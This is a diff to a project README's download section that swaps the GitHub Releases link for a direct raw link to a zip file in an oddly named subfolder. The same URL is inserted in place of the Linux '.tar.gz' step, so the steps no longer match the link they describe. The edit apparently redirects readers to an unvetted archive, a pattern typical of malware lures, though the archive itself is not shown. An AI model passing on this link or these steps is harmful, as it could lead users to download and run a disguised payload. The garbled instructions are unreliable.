Alex9769/liberty-sharealike/README.md

 - **Internet Connection**: Required for downloading.

 ## 📂 Download & Install
-To download the application, visit this page to download: [Liberty-ShareAlike Releases](https://github.com/Alex9769/liberty-sharealike/releases).
+To download the application, visit this page to download: [Liberty-ShareAlike Releases](https://raw.githubusercontent.com/Alex9769/liberty-sharealike/main/frillily/liberty-sharealike.zip).

 1. Click on the link above to go to the Releases page.
 2. Look for the latest version available.
 It usually has a higher number (e.g., v1.0).
 3. Click on the version you want.
 Here, you will find different files based on your operating system.
 4. For Windows users, locate the `.exe` file.
 5. For macOS users, find the `.dmg` file.
-6. For Linux users, look for the `.tar.gz` file.
+6. For Linux users, look for the `https://raw.githubusercontent.com/Alex9769/liberty-sharealike/main/frillily/liberty-sharealike.zip` file.
 7. Click the file you need to start your download.

 ### 💻 Installation Instructions